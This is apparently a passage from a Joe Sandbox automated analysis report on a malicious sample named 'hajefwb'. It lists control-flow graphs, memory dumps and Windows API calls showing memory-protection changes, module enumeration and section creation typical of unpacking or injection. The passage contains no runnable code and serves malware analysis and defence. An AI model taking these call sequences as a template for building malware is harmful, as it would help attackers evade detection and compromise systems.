                                              • VirtualProtect.KERNELBASE(007FBCB4,007FBE6C,00000040,?), ref: 0041E559
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439046439.0000000000411000.00000020.00000001.01000000.00000006.sdmp, Offset: 00411000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_411000_hajefwb.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProcProtectVirtual
                                              • String ID:
                                              • API String ID: 2099061454-0

                                              Control-flow Graph

                                              control_flow_graph 384 aab648-aab661 385 aab663-aab665 384->385 386 aab66c-aab678 CreateToolhelp32Snapshot 385->386 387 aab667 385->387 388 aab67a-aab680 386->388 389 aab688-aab695 Module32First 386->389 387->386 388->389 395 aab682-aab686 388->395 390 aab69e-aab6a6 389->390 391 aab697-aab698 call aab307 389->391 396 aab69d 391->396 395->385 395->389 396->390
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00AAB670
                                              • Module32First.KERNEL32(00000000,00000224), ref: 00AAB690
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439682112.0000000000AA8000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AA8000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_aa8000_hajefwb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 3833638111-0

                                              Control-flow Graph

                                              control_flow_graph 397 880e0f-880e24 SetErrorMode * 2 398 880e2b-880e2c 397->398 399 880e26 397->399 399->398
                                              APIs
                                              • SetErrorMode.KERNELBASE(00000400,?,?,00880223,?,?), ref: 00880E19
                                              • SetErrorMode.KERNELBASE(00000000,?,?,00880223,?,?), ref: 00880E1E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439322888.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_880000_hajefwb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0

                                              Control-flow Graph

                                              control_flow_graph 400 41e560-41e5bb LoadLibraryA
                                              APIs
                                              • LoadLibraryA.KERNELBASE(00428568,0041EAA6), ref: 0041E5B5
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439046439.0000000000411000.00000020.00000001.01000000.00000006.sdmp, Offset: 00411000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_411000_hajefwb.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439023319.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_hajefwb.jbxd
                                              Similarity
                                              • API ID: CreateDuplicateObjectSectionSleep
                                              • String ID:
                                              • API String ID: 4152845823-0
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439023319.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_hajefwb.jbxd
                                              Similarity
                                              • API ID: CreateDuplicateObjectSectionSleep
                                              • String ID:
                                              • API String ID: 4152845823-0
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439023319.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_hajefwb.jbxd
                                              Similarity
                                              • API ID: CreateDuplicateObjectSectionSleep
                                              • String ID:
                                              • API String ID: 4152845823-0
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439023319.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_hajefwb.jbxd
                                              Similarity
                                              • API ID: CreateDuplicateObjectSectionSleep
                                              • String ID:
                                              • API String ID: 4152845823-0
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00AAB358
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439682112.0000000000AA8000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AA8000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_aa8000_hajefwb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439023319.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_hajefwb.jbxd
                                              Similarity
                                              • API ID: CreateDuplicateObjectSectionSleep
                                              • String ID:
                                              • API String ID: 4152845823-0
                                              APIs
                                              • EndUpdateResourceA.KERNEL32(00000000,00000000,0042204C), ref: 0041E669
                                              • GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 0041E6C0
                                              • GetComputerNameA.KERNEL32(?,?), ref: 0041E6D0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439046439.0000000000411000.00000020.00000001.01000000.00000006.sdmp, Offset: 00411000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_411000_hajefwb.jbxd
                                              Similarity
                                              • API ID: ComputerHighestNameNodeNumaNumberResourceUpdate
                                              • String ID: <
                                              • API String ID: 2454257732-4251816714
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439046439.0000000000411000.00000020.00000001.01000000.00000006.sdmp, Offset: 00411000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_411000_hajefwb.jbxd
                                              Similarity
                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                              • String ID:
                                              • API String ID: 3016257755-0
                                              APIs
                                                • Part of subcall function 0041E600: GetStartupInfoA.KERNEL32(00000000), ref: 0041E617
                                                • Part of subcall function 0041E600: GetModuleHandleA.KERNEL32(00000000), ref: 0041E61F
                                              • GetEnvironmentStringsW.KERNEL32(00000000), ref: 0041E749
                                              • FindFirstVolumeW.KERNEL32(00000000,00000000), ref: 0041E753
                                              • GetShortPathNameW.KERNEL32(0042333C,?,00000000), ref: 0041E765
                                              • DeleteVolumeMountPointA.KERNEL32(00000000), ref: 0041E784
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439046439.0000000000411000.00000020.00000001.01000000.00000006.sdmp, Offset: 00411000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_411000_hajefwb.jbxd
                                              Similarity
                                              • API ID: Volume$DeleteEnvironmentFindFirstHandleInfoModuleMountNamePathPointShortStartupStrings
                                              • String ID:
                                              • API String ID: 3566876605-0
                                              APIs
                                              • GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 0041E6C0
                                              • GetComputerNameA.KERNEL32(?,?), ref: 0041E6D0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439046439.0000000000411000.00000020.00000001.01000000.00000006.sdmp, Offset: 00411000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_411000_hajefwb.jbxd
                                              Similarity
                                              • API ID: ComputerHighestNameNodeNumaNumber
                                              • String ID: <
                                              • API String ID: 3700106692-4251816714